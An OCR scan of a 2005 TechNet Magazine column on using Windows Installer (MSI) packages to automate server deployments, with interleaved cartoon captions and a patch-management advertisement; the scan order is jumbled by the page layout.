_ gobs of time making various servers work; 
_ they can write the deployment code once _ 
downtime deployment to completely | 


investment pays off and gives us a frame- 
work to then bring in new features like zero- 


minimize customer impact. 


www.technetmagazine.com 


The benefits of this investment are huge. 


' Not only do you have a way to bring your 
servers back to a well-known state after 


someone stomps on them, but you can now 
manage testing in a far more predictable 


fashion. No longer are developers spending _ 


and then reuse it for testing as well as pro- 
duction. The code pays off again when you 


| doa hardware upgrade, or if you rebuild a 
- machine from the ground up. 

I won't go through all the machinations 
of how to create an MS| as there are far too 
many great resources out there for you. 
MSDN’ Online is chock full of articles, as is 
' www.installsite.org. InstallShield and Wise offer 


third-party products to help any developer 
in creating their setup routines. So deploy 
and be proud that you did! C) 


Winter 2005 103 


IT and Life Experiences 


So here is the situation. Youve 
been here before, a hundred times if not 
more. Your server worked perfectly, flaw- 
lessly serving up Web pages, photos from 
the company meeting, and departmental 


memos on cost-cutting measures. Now it | 
hums at you the same as always, but pages _ 
are not displaying, password prompts are — 
appearing where they shouldnt, other sites _ 


have complete open access when they 
should be locked down, and “file not found” 


errors are popping up everywhere. You sit, | 


staring at the machine, feeling like you've 
lost your puppy. “But it was just working 
fine” you exclaim. You start the crusade to 


find out who did this to you: who wounded » 
_ thing running.” Ah yes, I hear your words, 
_ for they are my own. Many times I would | 
it. Janet down the hall needed to runa quick | 
_ him out of my office, and slammed the door. 


your pet server. 
It turns out everyone has had a hand in 


test for some new code. Quentin wanted to 
compare his settings against your server. 
Robert tuned the performance configura- 
tion to improve his application's data access 
speed. Now what are you to do? How can 
you retrieve your most sacred machine 
from the grave? 

Well, 'm happy to say that from the 
depths of hell comes good advice and good 
stories on how to protect yourself from 


The Secret Life of the I 


UNACCEPTABLE 


SERVER 
ARCHITECTURES 


104 TechNet Magazine 


EL D _Andrew Shum 


A STRING OF 
DAISY-CHAINED 
BLACK & DECKER 
"SMART TOASTERS." 


harm’s way. Invest in properly maintaining 


a setup application for even your surliest of — 
server components. I realize you're prob- 
ably looking at this page askance right now. | 
_ vestment we made on the support tools for 
| the MSN’ services team. It took one devel- 
| oper about four weeks to upgrade a legacy 


Midnight to 4 A.M. 
was reserved for 
the grueling 
synchronization of 
server settings. 
“Setup? For server components? I just copy 


those files in there and start tweaking set- 
tings. Why waste time? Just get the damn 


have said the same thing to a person, kicked 


However, I have learned the error of my 
ways. Investing in deployment technology, 


even for my server-side components, has _ 
' stall script? Yes/No.” Our deployments 
My team depends on the Microsoft’ | 
| Windows” Installer system (MSI files) to 


saved my butt. 


handle all sorts of server settings from vir- 


tual roots in IIS, to SQL configurations, to 


| Web pages, to security. Anyone who has in- 
stalled Microsoft Office or SQL Server™ has 
_ seen the UI for an MSI, where you can 
| specify folder locations and application set- 
tings. For the IT professional wrestling with 
| server components, this is where you can 
, now specify the things that are unique for 
_ each topology where you might deploy your 
_ bits—for example, which drive to use, the 
| physical server names, the connection to 


your database, credentials to run services 
under, and more. 
Our deployment code was the first in- 


system, based only on an obsolete installa- 


' tion document, to a fully automated de- 


ployment. The biggest problem was 
convincing the naysayers on our team that 


| itcould indeed be accomplished! The costs 


paid off very quickly by speeding up our 
deployment time and accuracy. Before the 


' automation, our deployments were sorry 
| affairs conducted in the middle of the night 
_ because they took so damn long and were 


impossible to test beforehand. Friday nights 
from midnight until 4 A.M. were reserved 
not for sleep, but for the grueling synchro- 
nization of server settings. 

After the automation implementation, we 
had a simple checklist“Did you run the in- 


dropped from multiple hours to just min- 


| utes. Obviously, there are pains to go 


Continued on page 103 


Andrew Shuman has been a developer, program manager, writer, and product unit manager at Microsoft for the past 10 years. 
He currently runs a team in MSN responsible for producing the platform for membership services. 


Pro By Hans Bjordah! 


A COMMODORE 64 
WITH AN APPLE 
NEWTON INTERFACE, 


A RHESUS MONKEY 
AND A "SIMON." 


roup Policy... 


BEASTER  ###§©ODE RED =  SIAMMER £SOBIG 


AVE FINALLY 


™. CELEBRATING ENTERPRISE SECURITY SUCCESS SINCE ioctl 
PATCHLINK™ | 


j 


The Patch Management Experts ™ 3D: DETECT : DEPLOY = DEFEND, 


